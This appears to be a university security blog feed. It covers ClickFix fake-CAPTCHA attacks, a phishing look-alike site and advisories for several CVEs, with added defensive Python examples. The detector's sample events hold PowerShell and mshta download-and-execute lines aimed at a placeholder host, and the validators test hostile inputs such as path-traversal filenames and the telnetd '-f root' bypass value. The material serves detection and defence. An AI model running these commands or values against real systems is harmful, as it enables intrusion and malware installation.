Information Security
/uit/infosec/

Fake CAPTCHA, Real Threat: ClickFix Social Engineering Attacks
Published: Wed, 22 Apr 2026 19:36:36 +0000
/uit/infosec/2026/04/22/fake-captcha-real-threat-clickfix-social-engineering-attacks/

The post Fake CAPTCHA, Real Threat: ClickFix Social Engineering Attacks appeared first on Information Security.

ClickFix attacks are a rapidly evolving threat that use fake CAPTCHA pages to trick people into running malicious commands (often PowerShell) on their own devices. In every ClickFix case, the attacker relies on one thing: your participation. Most traditional phishing attempts and malicious sites are filtered or blocked long before they reach you. That’s why ClickFix pushes you to take extra steps yourself. By convincing you to run a command, the attacker gets past the protections already set in place and installs malware that would otherwise be detected.

What is ClickFix?

ClickFix is a social engineering technique where attackers compromise legitimate websites and replace normal verification steps such as CAPTCHAs with fake prompts, and instruct users to run malicious commands on their computers. These commands often involve opening the Windows Run dialog or PowerShell and pasting in a script that appears to “fix” a problem or “verify” the user. In reality, the script is being used to download malware that compromises your device.

This technique has been observed across higher‑education institutions and is increasingly used to deploy malware families such as CORNFLAKE.V3, a backdoor capable of downloading additional payloads, collecting system information, and maintaining persistence on the device.

How Does It Work?

ClickFix attacks follow a simple pattern:

  1. You click on a link from a search result or ad, and as the page loads, a strange-looking CAPTCHA or pop‑up appears unexpectedly.
  2. Instead of asking you to click images or check a box, it tells you there’s a “problem” and you need to run a command to continue.
  3. The page instructs you to open the Run dialog (Windows + R), PowerShell, or Terminal and paste in a line of text.
  4. That command silently downloads malware onto your device. In many cases, it installs a backdoor such as CORNFLAKE.V3, which can download additional malicious files onto your system, collect system information, and stay hidden on your machine.

Because the attacker convinces you to run the command, your device treats it as a trusted action, making it much harder for security tools to block.
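Because the chain ends with a shell being launched from the Run dialog, one thing a defender can do with endpoint telemetry is look for a command interpreter whose parent is explorer.exe and whose command line fetches and runs remote content or hides its window. The script below is an added example for this post, not tooling from the vendors referenced; the event records and their field names (parent, image, cmdline) are constructed for the example.

```python
"""Flag ClickFix-style executions in process-creation telemetry: a shell launched
from the Windows Run dialog (explorer.exe parent) whose command line fetches and
runs remote content. Added example; the events below are constructed."""
import re

# Constructed process-creation events, in the shape a SIEM might normalise
# Sysmon/EDR data into (field names are an assumption of this example).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://example.invalid/v)"'},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    {"parent": "code.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -File build.ps1"},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Interpreters a fake-CAPTCHA page typically tells the victim to paste into.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Parents that correspond to a person pasting into Win+R or a terminal window.
USER_LAUNCHERS = {"explorer.exe", "windowsterminal.exe"}
# Command-line fragments that download-and-execute or hide the console window.
SUSPICIOUS = [
    r"\biex\b", r"invoke-expression", r"\birm\b", r"invoke-restmethod",
    r"invoke-webrequest", r"downloadstring", r"-w(indowstyle)?\s+hidden",
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", r"\bmshta\b\s+https?://",
]


def score_event(event):
    """Return the indicators matched by one event (empty list means benign)."""
    if event["image"].lower() not in SHELLS:
        return []
    if event["parent"].lower() not in USER_LAUNCHERS:
        return []
    cmd = event["cmdline"].lower()
    return [pattern for pattern in SUSPICIOUS if re.search(pattern, cmd)]


def find_clickfix_candidates(events):
    """Return (index, matched indicators) for each event an analyst should review."""
    hits = []
    for index, event in enumerate(events):
        matched = score_event(event)
        if matched:
            hits.append((index, matched))
    return hits


if __name__ == "__main__":
    for index, matched in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"event {index}: {SAMPLE_EVENTS[index]['cmdline']!r} -> {matched}")
```

The parent check is what keeps this rule quiet on build servers and developer machines: a PowerShell started by an IDE or a scheduler is not the pattern, while the same command line typed into Win+R is. Tune the indicator list to local telemetry before alerting on it.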

How Can I Spot a ClickFix Attempt?

Exercise caution towards any unfamiliar website, email, or popup that:

  • Asks you to open Windows Run (Windows + R)
  • Tells you to paste a command into PowerShell or Terminal
  • Claims you must run a script to “fix,” “verify,” or “continue”
  • Appears immediately after clicking a search result or ad
  • Displays a CAPTCHA that looks unusual, low‑quality, or out of place

If you encounter instructions like:

“Press Windows + R and paste the following command…”

…it is almost certainly malicious.

If you suspect you may have interacted with a ClickFix prompt, please report it to the Information Security Team immediately (infosec@yorku.ca).

References:

  • https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
  • https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
  • https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor/

Ninja Forms WordPress Plugin Vulnerability (CVE-2026-0740)
Published: Tue, 14 Apr 2026 14:23:53 +0000
/uit/infosec/2026/04/14/ninja-forms-wordpress-plugin-vulnerability-cve-2026-0740/

A recently disclosed critical vulnerability in the Ninja Forms – File Uploads plugin for WordPress (CVE‑2026‑0740) allows unauthenticated remote attackers to upload arbitrary files, potentially leading to remote code execution and full site compromise.

Severity level:-

CVSS Score: 9.8/Critical.

Description:-  The Ninja Forms – File Uploads plugin for WordPress fails to properly validate uploaded file types in the NF_FU_AJAX_Controllers_Uploads::handle_upload function. In vulnerable versions, this flaw allows unauthenticated attackers to upload arbitrary files, including malicious PHP scripts. Due to insufficient filename sanitization, attackers may also leverage path traversal techniques to place files in sensitive directories, such as the web root. Successful exploitation can result in remote code execution, web shell deployment, and complete takeover of the affected WordPress site.

Affected Versions:-

All versions up to and including 3.3.26.

Impact:-

Successful exploitation may result in remote code execution on the server.

Resolution:-

Upgrade immediately to Ninja Forms – File Uploads plugin version 3.3.27 or later.

Reference:-

UIT Information Security

Zoom Workplace for Windows Vulnerability (CVE-2026-30903)
Published: Tue, 14 Apr 2026 14:20:53 +0000
/uit/infosec/2026/04/14/zoom-workplace-for-windows-vulnerability-cve-2026-30903/

A recently disclosed vulnerability in Zoom Workplace for Windows (CVE‑2026‑30903) allows unauthenticated remote attackers to escalate privileges by exploiting improper control of file names or paths.

Severity level:-

CVSS Score: 9.6/Critical

Description:- Zoom Workplace for Windows includes a Mail feature that processes user-supplied file references. In vulnerable versions, this component fails to properly validate file paths, so an unauthenticated remote attacker who supplies crafted path inputs can manipulate file system operations. As a result, the attacker may escalate privileges on the affected system, gaining unauthorized access or control.
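Both this advisory and the Ninja Forms advisory above come down to the same two missing checks: validating what type of file a client-supplied name describes, and making sure the path built from that name stays inside the directory the application intended. The code below is an added example of those checks, written for this page; it is not code from Zoom, Ninja Forms, or WordPress, and the extension lists and the "/srv/uploads" directory are assumptions of the example.

```python
"""Two checks the Ninja Forms and Zoom advisories describe as missing: strict
file-type validation of a client-supplied filename, and containment of the
resulting path inside the intended directory. Added example, not product code."""
import os
import re

ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "gif", "docx"}
# Extensions a web server might execute; rejected anywhere in the name, so
# "shell.php.jpg" is refused even though its final extension is allowed.
EXECUTABLE_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phar",
                         "cgi", "pl", "asp", "aspx", "jsp", "sh", "exe", "htaccess"}


def sanitize_filename(name):
    """Reduce an untrusted filename to one safe path component of an allowed type."""
    # Drop any directory portion the client sent, whichever separator it used.
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    # Keep a conservative character set; everything else becomes an underscore.
    # Stripping leading/trailing dots removes ".", "..", ".htaccess" and "x.php.".
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base).strip(".")
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise ValueError(f"rejected filename {name!r}: no usable name or extension")
    if parts[-1] not in ALLOWED_EXTENSIONS:
        raise ValueError(f"rejected filename {name!r}: extension .{parts[-1]} not allowed")
    if any(part in EXECUTABLE_EXTENSIONS for part in parts[:-1]):
        raise ValueError(f"rejected filename {name!r}: executable extension embedded")
    return base


def resolve_within(base_dir, relative_path):
    """Return the absolute target path only if it resolves inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, relative_path))
    # commonpath rather than startswith: "/srv/uploads2" starts with
    # "/srv/uploads" as a string but is not inside that directory.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"rejected path {relative_path!r}: escapes {base_dir}")
    return target


def safe_upload_path(upload_dir, client_filename):
    """Where an upload with this client-chosen name may be written, or ValueError."""
    return resolve_within(upload_dir, sanitize_filename(client_filename))


if __name__ == "__main__":
    for candidate in ("report.pdf", "../../shell.php", "shell.php.jpg", "..\\..\\photo.JPG"):
        try:
            print(candidate, "->", safe_upload_path("/srv/uploads", candidate))
        except ValueError as exc:
            print(candidate, "->", exc)
```

Note that the two checks are independent: sanitize_filename alone would let a caller who builds the path differently reintroduce traversal, and resolve_within alone would happily place a .php file inside the web root. An upload handler needs both, and for user content it should also store files under a server-generated name in a directory the web server never executes from.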

Affected Versions:-

Zoom Workplace for Windows before version 6.6.0.

Impact:-

Successful exploitation potentially allows attackers to escalate privileges on the target system.

Resolution:-

Upgrade to Zoom Workplace for Windows version 6.6.0 or later immediately.

Reference:-

UIT Information Security

Apple Memory Corruption Vulnerability (CVE‑2026‑20700)
Published: Mon, 13 Apr 2026 18:00:51 +0000
/uit/infosec/2026/04/13/cve-2026-20700-apple-memory-corruption-vulnerability/

A newly disclosed Apple zero‑day vulnerability (CVE‑2026‑20700) allows attackers with memory‑write capabilities to execute arbitrary code on affected devices.

Severity level:-

CVSS Score: 7.8/High

Description:-  CVE‑2026‑20700 is a memory corruption vulnerability affecting Apple’s dyld (Dynamic Link Editor) component. Dyld is responsible for loading dynamic libraries and linking application code within Apple operating systems. Improper state management and insufficient memory‑safety controls can allow an attacker with memory write capability to achieve arbitrary code execution.

Affected Versions:-

  • iOS – versions prior to 26.3
  • iPadOS – versions prior to 26.3
  • iOS – versions prior to 18.7.5
  • iPadOS – versions prior to 18.7.5
  • macOS Tahoe – versions prior to 26.3
  • macOS Sequoia – versions prior to 15.7.4
  • macOS Sonoma – versions prior to 14.8.4
  • tvOS – versions prior to 26.3
  • watchOS – versions prior to 26.3
  • visionOS – versions prior to 26.3

Impact:-

Successful exploitation may allow attackers to execute arbitrary code at the OS level.

Resolution:-

Update to the following patched OS versions or later:-

  • iOS 26.3 / iPadOS 26.3
  • macOS Tahoe 26.3
  • tvOS 26.3
  • watchOS 26.3
  • visionOS 26.3
  • iOS / iPadOS 18.7.5
  • macOS Sequoia 15.7.4
  • macOS Sonoma 14.8.4
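The version table above has a subtlety that a naive "is the version at least 26.3" check gets wrong: Apple shipped the fix on several release branches, so an iPhone on iOS 18.7.5 is patched even though 18.7.5 is numerically below 26.3, while a Mac on macOS 13 has no listed fix at all. The checker below is an added example for this advisory, not Apple tooling; the fixed versions are taken from the advisory and the device inventory is constructed.

```python
"""Check whether an Apple device runs a build that includes the CVE-2026-20700
fix, comparing within the device's own release branch. Added example; the
version table comes from the advisory, the inventory below is constructed."""

# Fixed version per OS, one entry per release branch named in the advisory.
# A device is patched when it is on the same major branch as an entry and at
# or above that entry's version.
FIXED_VERSIONS = {
    "iOS": ["26.3", "18.7.5"],
    "iPadOS": ["26.3", "18.7.5"],
    "macOS": ["26.3", "15.7.4", "14.8.4"],   # Tahoe, Sequoia, Sonoma
    "tvOS": ["26.3"],
    "watchOS": ["26.3"],
    "visionOS": ["26.3"],
}


def parse_version(text):
    """'18.7.5' -> (18, 7, 5); tuples compare component-wise, as versions should."""
    return tuple(int(part) for part in text.strip().split("."))


def is_patched(os_name, version):
    """True if `version` is at or above the fix for its own major branch.

    Raises KeyError for an OS the advisory does not cover and ValueError for a
    branch it lists no fix for (for example macOS 13), which callers should treat
    as unpatched and unsupported rather than as safe."""
    current = parse_version(version)
    for fixed_text in FIXED_VERSIONS[os_name]:
        fixed = parse_version(fixed_text)
        if fixed[0] == current[0]:
            return current >= fixed
    raise ValueError(f"{os_name} {version}: branch not covered by the advisory")


def unpatched_devices(inventory):
    """Names of inventory entries (name, os, version) that still need the update."""
    needs_update = []
    for name, os_name, version in inventory:
        try:
            patched = is_patched(os_name, version)
        except ValueError:
            patched = False   # no fix exists for this branch: flag it
        if not patched:
            needs_update.append(name)
    return needs_update


SAMPLE_INVENTORY = [   # constructed device records
    ("ipad-lab-01", "iPadOS", "18.7.5"),
    ("iphone-02", "iOS", "18.7.4"),
    ("mbp-03", "macOS", "15.7.4"),
    ("mbp-04", "macOS", "26.2"),
    ("imac-05", "macOS", "13.7.2"),
    ("watch-06", "watchOS", "26.3.1"),
]

if __name__ == "__main__":
    print("needs update:", unpatched_devices(SAMPLE_INVENTORY))
```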

Reference:-

UIT Information Security

Ingress‑NGINX Configuration Injection Vulnerability (CVE-2026-24512)
Published: Mon, 13 Apr 2026 17:53:41 +0000
/uit/infosec/2026/04/13/ingress-nginx-configuration-injection-vulnerability-cve-2026-24512/

A recently discovered vulnerability in the Kubernetes ingress-nginx controller (CVE‑2026‑24512) allows attackers to execute arbitrary code by exploiting improper sanitization of user‑supplied ingress path data.

Severity level:-

CVSS Score: 8.8/High

Description:-  Ingress‑NGINX is a widely used open‑source Kubernetes ingress controller responsible for managing inbound traffic to cluster services. A vulnerability exists in ingress‑nginx where the rules.http.paths.path field fails to properly validate user‑defined input. This flaw allows attackers to inject rogue NGINX configuration directives, enabling arbitrary code execution within the ingress‑nginx controller container.

Affected Versions:-

All ingress-nginx versions prior to v1.13.7 (1.13 branch) and prior to v1.14.3 (1.14 branch) are affected.

Impact:-

Successful exploitation allows attackers to execute arbitrary code inside the ingress-nginx controller.

Resolution:-

Upgrade immediately to version 1.13.7 or 1.14.3, or later.

Mitigation:-

Deploy a validating admission controller that rejects Ingress resources using the ImplementationSpecific path type, blocking the attack vector.
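The check such an admission controller performs is small enough to show in full. The function below is an added example written for this advisory, not ingress-nginx code or a shipped admission policy: it rejects any path with the ImplementationSpecific pathType, as the mitigation describes, and additionally refuses paths containing characters that have no place in a URL prefix but do have meaning in NGINX configuration. The two Ingress manifests are constructed, and the character allow-list is this example's own assumption.

```python
"""Admission-style validation for Ingress objects: reject ImplementationSpecific
paths (the advisory's mitigation) and apply a strict character allow-list to
the path itself. Added example; manifests are constructed and the allow-list
is an assumption of this example, not an ingress-nginx rule."""
import re

# A benign Exact/Prefix path: "/" followed by unreserved URL characters. NGINX
# configuration syntax ('{', '}', ';', '#', '$', whitespace, newlines) and
# anything else is excluded, so no rules.http.paths.path value can reach the
# generated config carrying directive syntax.
SAFE_PATH = re.compile(r"/[A-Za-z0-9._~/-]*")
ADMITTED_PATH_TYPES = {"Exact", "Prefix"}


def validate_ingress(ingress):
    """Return a list of violations; an empty list means the object may be admitted."""
    name = ingress.get("metadata", {}).get("name", "<unnamed>")
    violations = []
    for rule in ingress.get("spec", {}).get("rules", []):
        for entry in rule.get("http", {}).get("paths", []):
            path = entry.get("path", "")
            path_type = entry.get("pathType")
            if path_type not in ADMITTED_PATH_TYPES:
                violations.append(
                    f"{name}: path {path!r} has pathType {path_type!r}; "
                    "only Exact or Prefix are admitted")
            if not SAFE_PATH.fullmatch(path):   # fullmatch: no trailing-newline bypass
                violations.append(
                    f"{name}: path {path!r} contains characters outside the allowed set")
    return violations


SAFE_INGRESS = {   # constructed
    "apiVersion": "networking.k8s.io/v1", "kind": "Ingress",
    "metadata": {"name": "web"},
    "spec": {"rules": [{"host": "app.example.invalid", "http": {"paths": [
        {"path": "/", "pathType": "Prefix",
         "backend": {"service": {"name": "web", "port": {"number": 80}}}},
        {"path": "/api/v1", "pathType": "Prefix",
         "backend": {"service": {"name": "api", "port": {"number": 8080}}}},
    ]}}]},
}

UNSAFE_INGRESS = {   # constructed: one forbidden pathType, one malformed path
    "apiVersion": "networking.k8s.io/v1", "kind": "Ingress",
    "metadata": {"name": "legacy"},
    "spec": {"rules": [{"http": {"paths": [
        {"path": "/old", "pathType": "ImplementationSpecific",
         "backend": {"service": {"name": "old", "port": {"number": 80}}}},
        {"path": "/x;\n}", "pathType": "Prefix",
         "backend": {"service": {"name": "x", "port": {"number": 80}}}},
    ]}}]},
}

if __name__ == "__main__":
    for manifest in (SAFE_INGRESS, UNSAFE_INGRESS):
        print(manifest["metadata"]["name"], validate_ingress(manifest) or "admitted")
```

In a cluster this logic would run behind a ValidatingWebhookConfiguration (or an equivalent policy engine) receiving the Ingress object from the API server; the function is the policy, independent of how it is wired in. Rejecting the pathType closes the vector the advisory names; the allow-list is defence in depth for the upgrade window.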

Reference:-

UIT Information Security

Phish Alert - Malicious Website Impersonating York University
Published: Tue, 17 Mar 2026 14:19:21 +0000
/uit/infosec/2026/03/17/phish-alert-malicious-website-impersonating-york-university/

The Information Security team has identified a fraudulent website impersonating York University that is actively attempting to harvest community members' login credentials. This malicious site closely mimics the appearance of official York University web properties and may be encountered when users attempt to access University services through search engines.

The impersonation site is NOT affiliated with York University and should be considered malicious. Do NOT enter your username, credentials, Duo 2FA codes, or any other personal information on this site, as this may result in unauthorized access to your accounts.

The fraudulent site uses the URL <www.yorkuonline.com>; an image is shown below for reference.

Red Flags to Watch Out For

Unsolicited messages directing you to log in:
Messages claiming your account will be disabled, your mailbox is full, or your access is expiring are common tactics used to lure users to fake login pages.

Suspicious URL:
Official York University login pages always use domains ending in yorku.ca. Any variation, such as extra characters, misspellings, or unfamiliar subdomains, should be treated as suspicious.

Unexpected login prompts:
If you are asked to “verify your account”, “update your credentials” or “restore access” after clicking a link you did not expect, this is a strong indicator of a phishing attempt.

Requests for Duo/MFA passcodes:
York University will never ask you to enter Duo 2FA codes outside of the official login process. Any site requesting your passcode directly should be considered malicious.
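"Ends in yorku.ca" is the right instinct, but it has to be applied to the host name, not to the text of the link, and with a dot boundary: notyorku.ca ends in those letters, yorku.ca.something.example puts the real name in front of a different domain, and a URL of the form https://yorku.ca@other.example actually points at other.example. The checker below is an added example for this alert, not a university tool; yorku.ca and www.yorkuonline.com are the two domains the alert names, and the other URLs are constructed look-alikes.

```python
"""Decide whether a login URL is on the university's official domain.
Added example for this alert; yorku.ca and www.yorkuonline.com come from the
alert, every other URL below is a constructed look-alike."""
from urllib.parse import urlsplit

OFFICIAL_DOMAIN = "yorku.ca"


def host_of(url):
    """Host name of an http(s) URL, without credentials or port, or None."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https"):
        return None
    # .hostname already drops the user@ part and the :port, and lower-cases.
    return (parts.hostname or "").rstrip(".")


def is_official_login_host(url, domain=OFFICIAL_DOMAIN):
    """True only for the domain itself or a genuine subdomain of it."""
    host = host_of(url)
    if not host:
        return False
    # The dot boundary is what rejects 'notyorku.ca' and 'yorku.ca.example';
    # a homoglyph or punycode look-alike never equals the ASCII domain either.
    return host == domain or host.endswith("." + domain)


SAMPLE_URLS = [   # constructed, except the first, which the alert names
    "https://www.yorkuonline.com/login",
    "https://login.yorku.ca/",
    "https://notyorku.ca/login",
    "https://yorku.ca.account-verify.example/",
    "https://yorku.ca@login.example/",
    "javascript:alert(1)",
]


def triage(urls):
    """Map each URL to whether it is on the official domain."""
    return {url: is_official_login_host(url) for url in urls}


if __name__ == "__main__":
    for url, official in triage(SAMPLE_URLS).items():
        print("official" if official else "SUSPICIOUS", url)
```

The check only answers "is this the official domain"; it cannot tell you that a page on a genuine subdomain is safe, and the displayed text of a link can differ from its target, so always read the address bar after the page has loaded.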

If you encounter any emails or messages directing you to this site, please report it using the Report Phishing button or forward the message to phishing@yorku.ca.

If you have already entered your credentials into the malicious site, change your password immediately by visiting . If you have any questions or concerns, please contact infosec@yorku.ca.

Notepad++ Vulnerability (CVE-2025-15556)
Published: Fri, 06 Feb 2026 16:53:58 +0000
/uit/infosec/2026/02/06/notepad-vulnerability-cve-2025-15556/

A recently discovered Notepad++ vulnerability (CVE‑2025‑15556) allows attackers to execute arbitrary code by exploiting insecure update integrity verification.

Severity level:-

CVSS Score: 7.7/High

Description:- Notepad++ is a free and open-source source code editor. A vulnerability exists in Notepad++ versions prior to 8.8.9 involving the WinGUp updater, which fails to cryptographically verify downloaded update metadata and installer files. An attacker who can intercept or redirect update traffic may fraudulently supply a malicious installer that the updater will download and run. This can result in arbitrary code execution with the privileges of the user, potentially compromising the system. An attacker could use social engineering or clickjacking to trick users into downloading both the legitimate installer and a malicious executable to the same directory.
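What "cryptographically verify downloaded update metadata and installer files" means in practice is a short chain of checks: authenticate the metadata first, refuse metadata that describes an older release, and only then compare the downloaded installer against the digest the authenticated metadata names. The code below is an added example of that chain, not WinGUp's code. A keyed HMAC stands in for the publisher's signature over the metadata so the example runs with the standard library alone; a real updater verifies an asymmetric signature against a pinned public key. All files and keys are constructed.

```python
"""The checks an auto-updater must perform before running what it downloaded:
authenticate the metadata, refuse downgrades, and bind the installer to the
digest the authenticated metadata carries. Added example, not WinGUp's code.
A keyed HMAC stands in for the publisher's signature; everything is constructed."""
import hashlib
import hmac
import json

PUBLISHER_KEY = b"constructed-publisher-key"   # stand-in for a pinned signing key


def sign_metadata(metadata, key=PUBLISHER_KEY):
    """Publisher side: canonical JSON body plus its authentication tag."""
    body = json.dumps(metadata, sort_keys=True).encode()
    return body, hmac.new(key, body, hashlib.sha256).hexdigest()


def _version(text):
    return tuple(int(part) for part in text.split("."))


def verify_update(metadata_body, metadata_tag, installer_bytes, installed_version,
                  key=PUBLISHER_KEY):
    """Return the parsed metadata if the update is safe to run; raise otherwise."""
    # 1. Authenticate the metadata before trusting a single field inside it.
    expected = hmac.new(key, metadata_body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, metadata_tag):
        raise ValueError("metadata signature invalid")
    meta = json.loads(metadata_body)
    # 2. A validly signed but older manifest must not roll the client back.
    if _version(meta["version"]) < _version(installed_version):
        raise ValueError("metadata describes an older release")
    # 3. The installer bytes must match the digest named in the metadata; the
    #    download URL itself is never a source of trust.
    actual = hashlib.sha256(installer_bytes).hexdigest()
    if not hmac.compare_digest(actual, meta["sha256"]):
        raise ValueError("installer digest mismatch")
    return meta


def build_sample_release():
    """Constructed release: a signed manifest and the installer it describes."""
    installer = b"constructed installer bytes, not a real executable"
    meta = {"version": "8.8.9", "url": "https://example.invalid/npp-installer.exe",
            "sha256": hashlib.sha256(installer).hexdigest()}
    body, tag = sign_metadata(meta)
    return body, tag, installer


def outcome(metadata_body, metadata_tag, installer_bytes, installed_version):
    """'accept' or 'reject: <reason>', the line an updater should log."""
    try:
        verify_update(metadata_body, metadata_tag, installer_bytes, installed_version)
        return "accept"
    except ValueError as exc:
        return f"reject: {exc}"


if __name__ == "__main__":
    body, tag, installer = build_sample_release()
    print(outcome(body, tag, installer, "8.8.8"))
    print(outcome(body, tag, b"swapped installer", "8.8.8"))
```

The order matters: checking the installer's digest against a field read from unauthenticated metadata proves nothing, because whoever swapped the installer can swap the digest too. That is why step 1 comes before any use of the metadata.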

Affected Versions:-

  • All versions prior to 8.8.9.

Impact:-

Successful exploitation enables attackers to execute arbitrary code potentially leading to compromise of affected systems.

Resolution:-

Update to version 8.8.9 or later.

Reference:-

UIT Information Security

GNU InetUtils telnetd authentication bypass (CVE-2026-24061)
Published: Fri, 06 Feb 2026 16:48:46 +0000
/uit/infosec/2026/02/06/gnu-inetutils-telnetd-authentication-bypass-cve-2026-24061/


A critical remote authentication bypass vulnerability (CVE-2026-24061) has been disclosed in the GNU InetUtils telnetd server, affecting versions 1.9.3 through 2.7.

Severity level:-

CVSS Score: 9.8/Critical.

Description:- CVE-2026-24061 is an argument injection / authentication-bypass vulnerability in the telnetd component of GNU InetUtils. During Telnet NEW-ENVIRON negotiation, telnetd passes the attacker-controlled USER environment variable directly to the system login program without sanitization. If USER is set to -f root, login treats the session as pre‑authenticated, yielding an unauthenticated root shell. The flaw impacts GNU InetUtils 1.9.3 through 2.7 and is fixed in 2.8.
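The missing control here is an input check on a value that crosses a trust boundary and then becomes an argument to a privileged program. The code below is an added example of that check, not GNU InetUtils code: a conservative allow-list for login names means a value beginning with "-" or containing whitespace can never be appended to argv, so the program on the other side cannot read it as an option. The argv layout is illustrative, the allow-list is this example's assumption, and the peer address is a constructed test value.

```python
"""Validate a remotely supplied username before it becomes an argv element of a
privileged program, the check whose absence CVE-2026-24061 describes. Added
example; the argv layout and allow-list are assumptions of this example."""
import re

# Conservative POSIX-style login name: no leading '-', no whitespace, no shell
# metacharacters, so the value can never be read as an option such as "-f".
USERNAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def validate_username(value):
    """Return the value unchanged if it is a plausible login name, else raise."""
    if not isinstance(value, str) or not USERNAME.fullmatch(value):
        raise ValueError(f"rejected USER value {value!r}")
    return value


def build_login_argv(peer_host, requested_user):
    """argv for the login program; only a validated name is ever appended."""
    return ["/bin/login", "-h", peer_host, "-p", validate_username(requested_user)]


def triage(values):
    """Map each candidate USER value to 'ok' or 'rejected'."""
    result = {}
    for value in values:
        try:
            validate_username(value)
            result[value] = "ok"
        except ValueError:
            result[value] = "rejected"
    return result


if __name__ == "__main__":
    print(build_login_argv("198.51.100.7", "alice"))        # constructed peer address
    print(triage(["alice", "-f root", "root;id", "", "Alice"]))
```

The allow-list is deliberately stricter than what many systems accept as a login name (upper-case letters are rejected, for instance); widening it is a local decision, but the leading-dash rule is the one that must stay.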

Affected Versions:-

  • GNU InetUtils package 1.9.3 – 2.7.

Impact:-

Successful exploitation allows unauthenticated remote attackers to bypass login and obtain root-level command execution on the affected host.

Resolution:-

Upgrade GNU InetUtils to version 2.8 or later.

Mitigation:-

If you cannot upgrade immediately:

  • Disable the telnetd service.
  • Restrict access to Telnet to trusted management networks only.

Reference:-

UIT Information Security

CVE-2025-14847 - MongoBleed - Vulnerability Affecting MongoDB
Published: Fri, 06 Feb 2026 16:44:24 +0000
/uit/infosec/2026/02/06/cve-2025-14847-mongobleed-vulnerability-affecting-mongodb/

Mismatched length fields in Zlib compressed protocol headers may allow a read of uninitialized heap memory by an unauthenticated client. 

Severity level:-

CVSS Score: 8.7/High

Description:- CVE-2025-14847, known as MongoBleed, is a heap-memory disclosure vulnerability in MongoDB Server. It arises in the server’s zlib compression handling logic, specifically in how it parses compressed network messages. By sending specially crafted messages with inconsistent length fields, an attacker can cause MongoDB to return uninitialized heap memory, potentially exposing sensitive in-memory data, without any authentication.
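The "inconsistent length fields" are the uncompressedSize a compressed wire-protocol message declares versus the number of bytes zlib actually produces. A parser that sizes its output buffer from the declared value and copies only what zlib wrote leaves the rest of that buffer holding whatever was previously on the heap, and that is what gets sent back. The parser below is an added example showing the check that prevents it, not MongoDB server code; the frames are constructed with the included sender helper, and the opcode and compressor constants are those of the MongoDB wire protocol.

```python
"""Parse a MongoDB OP_COMPRESSED frame and refuse any message whose declared
uncompressedSize disagrees with what zlib actually produces, the mismatch that
MongoBleed turns into a read of uninitialised heap memory. Added example, not
server code; the frames are constructed with the sender helper below."""
import struct
import zlib

OP_COMPRESSED = 2012    # wire-protocol opcode of the compressed envelope
OP_MSG = 2013           # opcode of the message wrapped in these examples
ZLIB_ID = 2             # compressorId value for zlib
HEADER = struct.Struct("<iiii")         # messageLength, requestID, responseTo, opCode
COMPRESSED_HDR = struct.Struct("<iiB")  # originalOpcode, uncompressedSize, compressorId


def build_op_compressed(payload, declared_size=None, request_id=1):
    """Sender side (constructed): wrap `payload` in OP_COMPRESSED using zlib.
    `declared_size` lets a test lie about the uncompressed length."""
    declared = len(payload) if declared_size is None else declared_size
    inner = COMPRESSED_HDR.pack(OP_MSG, declared, ZLIB_ID) + zlib.compress(payload)
    return HEADER.pack(HEADER.size + len(inner), request_id, 0, OP_COMPRESSED) + inner


def parse_op_compressed(frame, max_uncompressed=48 * 1024 * 1024):
    """Return (originalOpcode, payload), or raise ValueError for an inconsistent frame."""
    fixed = HEADER.size + COMPRESSED_HDR.size
    if len(frame) < fixed:
        raise ValueError("frame shorter than the fixed headers")
    msg_len, _request_id, _response_to, opcode = HEADER.unpack_from(frame, 0)
    if opcode != OP_COMPRESSED or msg_len != len(frame):
        raise ValueError("opcode/length header mismatch")
    orig_op, declared, comp_id = COMPRESSED_HDR.unpack_from(frame, HEADER.size)
    if comp_id != ZLIB_ID:
        raise ValueError(f"unsupported compressorId {comp_id}")
    if not 0 <= declared <= max_uncompressed:
        raise ValueError(f"uncompressedSize {declared} out of range")
    # Decompress into a fresh buffer bounded at declared+1 bytes, so an overrun
    # is detectable without unbounded allocation, then insist the real length
    # equals the declared one. Sizing a buffer from `declared` and copying only
    # what zlib wrote would hand the never-written remainder to the client.
    decompressor = zlib.decompressobj()
    try:
        payload = decompressor.decompress(frame[fixed:], declared + 1)
    except zlib.error as exc:
        raise ValueError(f"corrupt zlib stream: {exc}") from exc
    if len(payload) != declared or not decompressor.eof or decompressor.unused_data:
        raise ValueError(f"uncompressedSize {declared} != actual {len(payload)} bytes")
    return orig_op, payload


if __name__ == "__main__":
    body = b"\x00\x00\x00\x00" + b'{"ping": 1}'   # constructed OP_MSG-shaped bytes
    print(parse_op_compressed(build_op_compressed(body)))
    for lie in (len(body) + 64, len(body) - 2):
        try:
            parse_op_compressed(build_op_compressed(body, declared_size=lie))
        except ValueError as exc:
            print("rejected:", exc)
```

Both directions of the lie are rejected: a declared size larger than the real output is the MongoBleed shape, and a smaller one would truncate a message silently. Disabling zlib via networkMessageCompressors, as the resolution below suggests, removes this code path entirely until the server is patched.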

Affected Versions:-

  • 8.2.x < 8.2.3.
  • 8.0.x < 8.0.17.
  • 7.0.x < 7.0.28.
  • 6.0.x < 6.0.27.
  • 5.0.x < 5.0.32.
  • 4.4.x < 4.4.30.
